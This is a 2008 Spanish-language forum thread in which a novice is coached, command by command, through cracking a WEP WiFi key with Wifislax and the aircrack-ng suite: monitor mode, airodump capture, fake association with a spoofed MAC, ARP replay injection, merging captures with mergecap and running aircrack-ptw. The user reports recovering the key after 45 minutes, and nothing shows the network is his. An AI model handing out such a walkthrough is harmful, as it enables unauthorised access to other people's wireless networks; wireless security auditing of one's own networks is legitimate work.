Autor Tema: VMware + Wifislax 3.1 + ataques  (Leído 17218 veces)

0 Usuarios y 1 Visitante están viendo este tema.

meigallo99

  • Visitante
VMware + Wifislax 3.1 + ataques
« en: 22-02-2008, 09:50 (Viernes) »
Hola
necesito un poquito mas de ayuda,no se como hacer la auditoria, ai van las preguntas:  ??? ???

Modo monitor
1- pongo "airmon-ng start rausb0" y miro cual es la red de la auditoria y en que canal esta
2- cierro esa shell y pongo "airmon-ng start rausb0 X " con el canal en vez de la X
y ya tengo en modo monitor, vale.

seguimos, para capturar:
4-pongo "airodump-ng -w datos -cX --bssid MAC objetivo rausb0", en la "X" pongo el canal y en "MAC objetivo"
pongo el BSSID en cuestion.

Para inyectar:
Como saber si hay un cliente conectado?
y si es asi, cual es el MAC cliente
Si no hay cliente conectado:
1- conseguir asociacion "aireplay-ng -1 30 -e ESSID -a MAC objetivo -h 00:11:22:33:44:55 rausb0, como saber
cuando se consigue la asociación? ???
2- inyectar despues de conseguir asociacion: "aireplay-ng -3 -x600 -b MAC objetivo -h 00:11:22:33:44:55 rausb0"
como veo si inyecta?, que es lo que se ve?, sube la opcion "packets"de la shell que tenemos en modo monitor? ???

como conseguir clave?? cuando pongo "aircrack-ptw archivo.cap." para conseguir clave que tengo
que poner en "archivo"? ???

Ya se que alomejor es mucho pedir pero seria magnifico si pudierais enviar alguna foto de alguna captura para poder guiarmos

tengo que pedir disculpas por anticipado por si alguna de las preguntas parecen ""tontas"" pero ai que darse de cuenta que no todos somos informaticos.


MUCHAS grazias a todos y en especial a drvalium, cuando pueda hacer la auditoria te aseguro que te hago un monumento en el medio de la plaza mayor, la mereces solo por tu paciencia.  ;D ;D
un saludo.  ;D ;D



ChimoC

  • Visitante
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #1 en: 22-02-2008, 11:53 (Viernes) »
Hola
necesito un poquito mas de ayuda,no se como hacer la auditoria, ai van las preguntas:  ??? ???

Modo monitor
1- pongo "airmon-ng start rausb0" y miro cual es la red de la auditoria y en que canal esta
2- cierro esa shell y pongo "airmon-ng start rausb0 X " con el canal en vez de la X
y ya tengo en modo monitor, vale.

seguimos, para capturar:
4-pongo "airodump-ng -w datos -cX --bssid MAC objetivo rausb0", en la "X" pongo el canal y en "MAC objetivo"
pongo el BSSID en cuestion.

Para inyectar:
Como saber si hay un cliente conectado? Te lo dice y lo ves en el airodump
y si es asi, cual es el MAC cliente Idem que antes
Si no hay cliente conectado:
1- conseguir asociacion "aireplay-ng -1 30 -e ESSID -a MAC objetivo -h 00:11:22:33:44:55 rausb0, como saber
cuando se consigue la asociación? ??? Te sale un monigote de association succ...  :) Y para poner esa MAC (11:22.....) antes debes haber cambiado tu mac con macchanger (por ejemplo)
2- inyectar despues de conseguir asociacion: "aireplay-ng -3 -x600 -b MAC objetivo -h 00:11:22:33:44:55 rausb0"
como veo si inyecta?, que es lo que se ve?, sube la opcion "packets"de la shell que tenemos en modo monitor? ??? Te subirán los datas y verás que tambien te suben los arp (XXXX arp)

como conseguir clave?? cuando pongo "aircrack-ptw archivo.cap." para conseguir clave que tengo
que poner en "archivo"? ??? Lo que has puesto detras del -w del airodump... en tu caso datos-01.cap

Ya se que alomejor es mucho pedir pero seria magnifico si pudierais enviar alguna foto de alguna captura para poder guiarmos Por favor... hay mucha gente que ha hecho manuales.... busca uno de AINZA... por ejemplo...

tengo que pedir disculpas por anticipado por si alguna de las preguntas parecen ""tontas"" pero ai que darse de cuenta que no todos somos informaticos. Yo tampoco lo soy... y muchos de los de aquí seguro que tampoco... pero dedicamos tiempo y meses o años..... es como todo... a base de leer, probar, paciencia y tenacidad.... se consigue


MUCHAS grazias a todos y en especial a drvalium, cuando pueda hacer la auditoria te aseguro que te hago un monumento en el medio de la plaza mayor, la mereces solo por tu paciencia.  ;D ;D La verdad es que si que tiene mucha paciencia  ;D
un saludo.  ;D ;D

Como ves te he dividido el post.... recuerda.. posts nuevos que nada tengan que ver con el post original...abrir un post para ello  ;)

Un saludo

ChimoC

Desconectado drvalium

  • Moderador Global
  • *
  • Mensajes: 17410
  • Misántropo
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #2 en: 22-02-2008, 20:37 (Viernes) »
buenas

Citar
Para inyectar:
Como saber si hay un cliente conectado?

Si hay un cliente conectado lo notaras por que al haber trafico entre el router (punto de acceso) y el pc (cliente) los #data van subiendo.


Citar
y si es asi, cual es el MAC cliente

los clientes conectados son los que aparecen en la parte de abajo,  en la columna station salen las MAC de los clientes.


Citar
cuando se consigue la asociación?

cuando veas esto




Citar
como veo si inyecta?, que es lo que se ve?

¿que es lo que se ve? aunque te lo contara no me creerias ;D ;D ;D ;D, tu tranquilo,mira los numeritos y cuando empieces a inyectar ya lo notaras ;)

bueno, con esto tendrias que ir haciendo, la verdad es que no te he dicho nada que no te hubiese dicho ChimoC en ru respuesta, pero ¡¡¡¡¡como me mola poner fotos!!! ;D ;D ;D ;D ;D

Citar
ChimoC
antes debes haber cambiado tu mac con macchanger

yo no lo hago y sin embargo consigo asociarme, fíjate en las capturas ;)

saludos
« Última modificación: 23-02-2008, 00:48 (Sábado) por drvalium »

meigallo99

  • Visitante
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #3 en: 28-02-2008, 17:57 (Jueves) »
hola:
mas problemillas.Haver cuando llego a la opcion de conseguir clave, pongo "aircrack-ptw datos-01.cap" y
me aparece esto:


wifislax ~ # aircrack-ptw datos-01.cap
Bienvenido a Aircrack PTW v 1.0.0 (Spanish Build 2)

Pagina oficial: http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/
Traduccion y mejoras por: Stilo16v (http://www.seguridadwireless.net)

Buscando una nueva tabla
BSSID = **:*3:*9:**:*2:*D  Keyindex=0
Estadisticas para BSSID **:*3:4*:**:*2:*D  Keyindex=0 Paquetes=3

No se ha encontrado una clave, desea continuar con aircrack-ng [S,n]?:


si le digo que si me aparece:


Ejecutando aircrack-ng... (no funcionara si el fichero .cap esta dentro de /root)

Opening datos-01.cap
Read 296 packets.

   #  BSSID              ESSID                     Encryption

   1  00:0*:3*:**:**:*C      ********82                No data - WEP or WPA
   2  0*:**:49:*2:**:CD      WL**_5*                     WEP (9 IVs)
   3  0*:*9:*B:*2:0*:*6       ***O                           No data - WEP or WPA
   4  **:*2:*7:*0:*F:*1       domo********3        No data - WEP or WPA
   5  *0:A*:*5:*1:**:**       A*****I                     No data - WEP or WPA
   6  0*:*4:A*:**:6*:*8       C***                          WEP (58 IVs)
   7  *A:*8:*E:6*:**:*C       W*****S                   None (0.0.0.0)
   8  **:**:*B:*3:*A:**       l******98                  WEP (10 IVs)
   9  0*:1*:2*:0*:1*:A*       W****96                    No data - WEP or WPA

Index number of target network ?



(evidentemente sin nigun asterisco, y con los correspondientes numeros y letras de los BSSID y los ESSID)
Y si me fijo tanto en el BSSID como en el ESSID no aparece al que estoy haciendo la auditoria, no esta en esa lista.
tengo 660000 paquetes inyectados, o eso creo. en la otra shell me aparece:


Saving ARP requests in replay_arp-0228-162522.cap
You should also start airodump-ng to capture replies.
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Read 748000 packets (got 509043 ARP requests), sent 760012 packets...(243pps)


un saludo y muchas grazias.

Desconectado drvalium

  • Moderador Global
  • *
  • Mensajes: 17410
  • Misántropo
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #4 en: 01-03-2008, 00:33 (Sábado) »
Buenas

cada vez que haces una prueba si siempre pones el mismo nombre al archivo (por ejemplo datos), wifislax los acumula y autonumera en vez de sobrescribirlos.


Prueba a entrar en la carpeta Home desde el icono del escritorio busca el archivo "datos" con la numeración mas alta y arrástralo a la consola.

según el ejemplo de la captura quedaría así
Código: [Seleccionar]
aircrack-ptw /root/datos-08.cap

saludos

PD:creo que hay una forma de unir todos los .cap en un solo archivo, te lo miro ;)

katmox

  • Visitante
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #5 en: 02-03-2008, 12:20 (Domingo) »

PD:creo que hay una forma de unir todos los .cap en un solo archivo, te lo miro ;)

en el Aircrack-ng  tienes una utilidad  llamada  Ivstools con la que puedes unir  capturas  .cap

aqui tienes la informacion:
http://www.wirelessdefence.org/Contents/Aircrack-ng_WinIvstools.htm

Desconectado drvalium

  • Moderador Global
  • *
  • Mensajes: 17410
  • Misántropo
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #6 en: 02-03-2008, 18:57 (Domingo) »
buenas

Puedes unir los .cap con el comando mergecap, la cosa seria así:

 
Código: [Seleccionar]
mergecap archivo-01 archivo-02 archivo-03 -w resultado.cap
En referencia a las capturas anteriores quedaria así


después seria esto:

Código: [Seleccionar]
aircrack-ptw ' /root/todoslosdatos.cap'

Si te interesa profundizar existe este tema abierto:

Como unir cap??

saludos


meigallo99

  • Visitante
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #7 en: 07-03-2008, 09:41 (Viernes) »
ola
vale y una vez que los e unido que tengo que poner ???
todoslodatos.cap en vez de datos-01.cap  ??? ???
cuando pueda ya lo pruebo y os comento que estoy muy liado y no puedo acer nada, tengo el ordenador aparcado  ;D ;D
un saludo

Desconectado drvalium

  • Moderador Global
  • *
  • Mensajes: 17410
  • Misántropo
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #8 en: 07-03-2008, 21:19 (Viernes) »
buenas

todoslodatos.cap en vez de datos-01.cap  ??? ???

correcto.

saludos


meigallo99

  • Visitante
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #9 en: 18-03-2008, 12:46 (Martes) »
olaa
ok os comento:
217167 paquetes inyectados y vuala!!!! clave de 28 cifras a tomar por culo!! con perdon.
magnifico, me parece increible, 28 cifras y tardo en descifrarla como 45 minutos!!!!.
Dr.valium eres el mejor. muchas grazias por tu ayuda, qualquier cosa que querais solo teneis que preguntar, me seguire conectando al foro modo regular y todo lo que querais ya sabeis.
un saludo a todos y muchisimas grazias a  Dr.valium.
« Última modificación: 23-03-2008, 19:52 (Domingo) por meigallo99 »

Desconectado drvalium

  • Moderador Global
  • *
  • Mensajes: 17410
  • Misántropo
Re: VMware + Wifislax 3.1 + ataques
« Respuesta #10 en: 18-03-2008, 20:43 (Martes) »
buenas

felicitaciones por tu éxito.

Cita de: megaillo99
217167 paquetes inyectados y vuala!!!! clave de 28 cifras a tomar por culo!! con perdon

usando aircrack-ptw con 100.000 deberia bastar, en ocasiones con 50.000 ya es suficiente.

Cita de: megaillo99
me seguire conectando al foro modo regular

me alegra saberlo.  :D

Cita de: megaillo99
MUCHISIMAS GRAZIAS A DR.VALIUM

De nada, aquí estamos para lo que necesites.

saludos


PD: por norma general escribir en mayúsculas significa que gritas a la gente, se que no es tu caso y que lo que querías era resaltar tus agradecimientos, para esos casos es mejor usar las negritas o cambiar el color de las fuentes, por favor si puedes edita el post y quita las mayúsculas  ;).